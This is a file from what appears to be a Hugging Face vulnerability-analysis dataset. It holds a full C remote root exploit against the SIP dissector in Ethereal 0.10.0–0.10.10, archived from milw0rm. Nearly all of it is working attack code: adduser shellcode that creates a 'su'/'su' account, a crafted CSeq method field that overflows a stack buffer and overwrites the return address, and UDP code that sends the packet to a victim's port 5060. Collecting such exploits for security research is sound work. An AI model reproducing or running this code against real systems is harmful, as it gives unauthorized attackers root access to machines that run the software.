Team Ai
Modelpublic

lilbool/vuln-code-analysis

sourceHugging Facemitupdated 2y agoView on Hugging Face
0likes
exploit_1021.txt200 linesDownload Raw Back to exploits
1/* tethereal_sip.c (now quite functional)

2*

3* Ethereal (0.10.0 to 0.10.10) SIP Dissector remote root exploit

4*

5* Advisory: 

6* http://www.ethereal.com/appnotes/enpa-sa-00019.html

7* 

8* produced by Team W00dp3ck3r:

9* frauk\x41iser

10* mag00n

11* s00n

12* thorben

13* 

14* Notes:

15* tested on Debian Sarge 

16* Linux maggot4 2.6.8-1-386 #1 Mon Sep 13 23:29:55 EDT 2004 i686 GNU/Linux

17*

18* tested version of ethereal:

19* http://www.ethereal.com/distribution/all-versions/ethereal-0.10.10.tar.gz

20* (./configure, make, make install ;))

21* 

22* victim has to switch from normal user to root using "su -" 

23* the exploit adds a user named "su" with password "su" on the victim host

24* 

25*/

26

27

28#include <stdio.h>

29#include <stdlib.h>

30#include <sys/types.h>

31#include <sys/socket.h>

32#include <netdb.h>

33#include <netinet/in.h>

34

35

36unsigned char sip_header[] = 

37"\x4f\x50\x54\x49\x4f\x4e\x53\x20\x73\x69\x70\x3a\x68\x61\x63"

38"\x6b\x20\x53\x49\x50\x2f\x32\x2e\x30\x0a\x56\x69\x61\x3a\x20"

39"\x53\x49\x50\x2f\x32\x2e\x30\x2f\x55\x44\x50\x20\x63\x70\x63"

40"\x31\x2d\x6d\x61\x72\x73\x31\x2d\x33\x2d\x30\x2d\x63\x75\x73"

41"\x74\x32\x32\x35\x2e\x6d\x69\x64\x64\x2e\x63\x61\x62\x6c\x65"

42"\x2e\x6e\x74\x6c\x2e\x63\x6f\x6d\x3a\x35\x35\x31\x31\x38\x3b"

43"\x72\x70\x6f\x72\x74\x0d\x0a\x56\x69\x61\x3a\x20\x53\x49\x50"

44"\x2f\x32\x2e\x30\x2f\x55\x44\x50\x20\x68\x61\x63\x6b\x3a\x39"

45"\x0a\x46\x72\x6f\x6d\x3a\x20\x73\x69\x70\x3a\x68\x61\x63\x6b"

46"\x3b\x74\x61\x67\x3d\x36\x31\x35\x61\x65\x37\x37\x30\x0a\x54"

47"\x6f\x3a\x20\x73\x69\x70\x3a\x68\x61\x63\x6b";

48

49unsigned char callid[] =

50"\x0a\x43\x61\x6c\x6c\x2d\x49\x44\x3a\x20";

51

52

53/* adduser shellcode, user: "su", pwd: "su" Full Size=116, splitted into 

542 parts because one buffer was too small. thx to http://metasploit.com */

55unsigned char shellcode[] =

56"\x31\xc9\x83\xe9\xe9\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa5"

57"\xb7\x95\xbb\x83\xeb\xfc\xe2\xf4\x94\x7e\x1c\x70\xcf\xf1\xcd\x76"

58"\x25\xdd\x90\xe3\x94\x7e\xc4\xd3\xd6\xc4\xe2\xdf\xcd\x98\xba\xcb"

59"\xc4\xdf\xba\xde\xd1\xd4\x1c\x58\xe4\x02\x91\x76\x25\x24\x7d\x9b"

60"\xa5\xb7\x95\xc8\xd0\x8d\xd4\xfa\xdf\xf2\xac\xd4\xd4\xf9\xdd\xed"

61"\xf5\x82\xe6\x81\x95\x8d\xa5\x81\x9f\x98\xaf\x94\xc7\xde\xfb\x94"

62"\xd6\xdf\x9f\xe2\x2e\xe6";

63

64

65unsigned char cseq[] = 

66"\x0a\x43\x53\x65\x71\x3a\x20";

67

68/* the malformed cseq method field. the buffer has a size of 16 byte. you need 

6948 byte to overwrite the return address. the first byte is checked isalpha(), 

70so we splitted the shellcode in a way that the first char of cseq_method passes

71the isalpha() check. */ 

72unsigned char cseq_method[] = 

73"\x69\xd1\xa1\xef\x58\x3b\xcf\xb6\xcd\x76\x25\xb7\x95\xbb";

74

75

76/* needed to be a fully valid sip packet */

77unsigned char sip_footer[] =

78"\x0a\x43\x6f\x6e\x74\x61\x63\x74\x3a\x20\x68\x61\x63\x6b\x3a"

79"\x39\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74"

80"\x68\x3a\x20\x30\x0a\x4d\x61\x78\x2d\x46\x6f\x72\x77\x61\x72"

81"\x64\x73\x3a\x20\x37\x30\x0a\x55\x73\x65\x72\x2d\x41\x67\x65"

82"\x6e\x74\x3a\x20\x57\x30\x30\x64\x70\x33\x63\x6b\x33\x72\x20"

83"\x0a";

84

85

86

87int main(int argc, char * argv[]) {

88unsigned int i, offset, ret, p_addr;

89struct sockaddr_in dest;

90struct hostent *he;

91int sock, slen = sizeof(struct sockaddr);

92unsigned char buffer[2048];

93

94// help output

95if(argc < 3) {

96printf("correct syntax: %s <flag> <host> \n", argv[0]);

97printf("possible flag: \n");

98printf("1 the ethereal user has started tethereal" 

99"with full path as root \n");

100printf("2 the ethereal user has started tethereal" 

101"without directorypath as root \n");

102return 1;

103}

104

105// p_addr may differ on other systems ;)

106if (argv[1][0] == '1') {

107p_addr = 0xbffee328;

108}

109

110if (argv[1][0] == '2') {

111p_addr = 0xbffee338;

112}

113

114// destination-ip check

115if((he = gethostbyname(argv[2])) == NULL) {

116printf("[!] Couldn't resolve %s\n", argv[2]);

117return 1;

118}

119

120// open socket

121if((sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0) {

122perror("socket()");

123return 1;

124}

125

126// set packet parameters

127dest.sin_port = htons(5060);

128dest.sin_family = AF_INET;

129dest.sin_addr = *((struct in_addr *)he->h_addr);

130

131// set the returnaddress (may differ on other systems)

132ret = 0xbffee240; 

133

134

135//// generate a buffer containing the data ////

136offset = 0;

137

138// set all values of the buffer to 0x0

139memset(buffer, 0x0, sizeof(buffer));

140

141// copy the header into the buffer

142memcpy(buffer+offset, sip_header, sizeof(sip_header)); 

143offset += sizeof(sip_header) -1;

144

145// concat the callid into the buffer

146memcpy(buffer+offset, callid, sizeof(callid)); 

147offset += sizeof(callid) -1;

148

149// add the callid-value (nop+shellcode)

150i = 128 - sizeof(shellcode) +1; 

151memset(buffer+offset, 0x90, i);

152offset += i;

153

154// insert shellcode into buffer

155memcpy(buffer+offset, shellcode, sizeof(shellcode));

156offset += sizeof(shellcode) -1; 

157

158

159// concat the cseq

160memcpy(buffer+offset, cseq, sizeof(cseq)); 

161offset += sizeof(cseq) -1;

162

163// generate the part, which causes the overflow (=cseq-method)

164memcpy(buffer+offset, cseq_method, sizeof(cseq_method)); 

165offset += sizeof(cseq_method) -1; 

166

167// fill the rest of cseq_method with A

168memset(buffer+offset, 0x41, 30);

169offset += 30; 

170// write return address

171*(long *)&buffer[offset] = ret; 

172offset += 4;

173

174// repair the first pointer after ret- address

175*(long *)&buffer[offset] = 0x08215184; // is a pointer DEST-value: 0x1

176offset += 4;

177// repair second pointer after ret- address 

178*(long *)&buffer[offset] = p_addr;

179offset += 4; 

180

181// the finalising part of the message

182memcpy(buffer+offset, sip_footer, sizeof(sip_footer)); 

183

184// send the buffer to the victim

185if (sendto(sock, buffer, sizeof(buffer), 0, 

186(struct sockaddr *)&dest, slen)== -1) {

187printf("[!] Error sending packet!\n");

188return 1;

189}

190

191// DEBUG //

192// printf("%s\n", buffer);

193

194printf("[*] dark W00dp3ck3r packet sent!\n");

195close(sock);

196return 0;

197

198}

199

200// milw0rm.com [2005-05-31]